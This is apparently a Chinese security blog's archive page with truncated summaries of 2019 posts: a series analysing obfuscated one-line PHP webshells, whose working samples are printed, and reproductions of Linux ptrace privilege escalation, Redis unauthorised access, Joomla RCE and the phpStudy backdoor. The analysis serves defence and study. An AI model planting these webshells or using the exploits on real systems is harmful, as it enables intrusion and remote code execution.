10 2019 档案
摘要:WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("
阅读全文
摘要:WebShell代码分析溯源(三) 一、一句话变形马样本 <?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?> 二、代码分析 1、调整代码格式 2、分析代码 分析代码,首先创建一个g数组,然后拼接字符串,
阅读全文
摘要:WebShell代码分析溯源(二) 一、一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二、代码分析 1、调整代码格式 2、分析代码,首先先把”assert”字符串
阅读全文
摘要:WebShell代码分析溯源(一) 一、一句话变形马样本 <?php $_GET['POST']($_POST['GET']);?> 二、代码分析 1、调整代码格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析代码,首先以GET方法接收url中POST参数传
阅读全文
摘要:Linux本地内核提权漏洞复现(CVE-2019-13272) 一、漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_cred函数。但是,对象struct cred的生存周期规则不允许无条件地将RCU引用转换为稳定引用。
阅读全文
摘要:Redis未授权访问漏洞复现 一、漏洞描述 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问
阅读全文
摘要:Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configurat
阅读全文
摘要:phpStudy后门漏洞利用复现 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近
阅读全文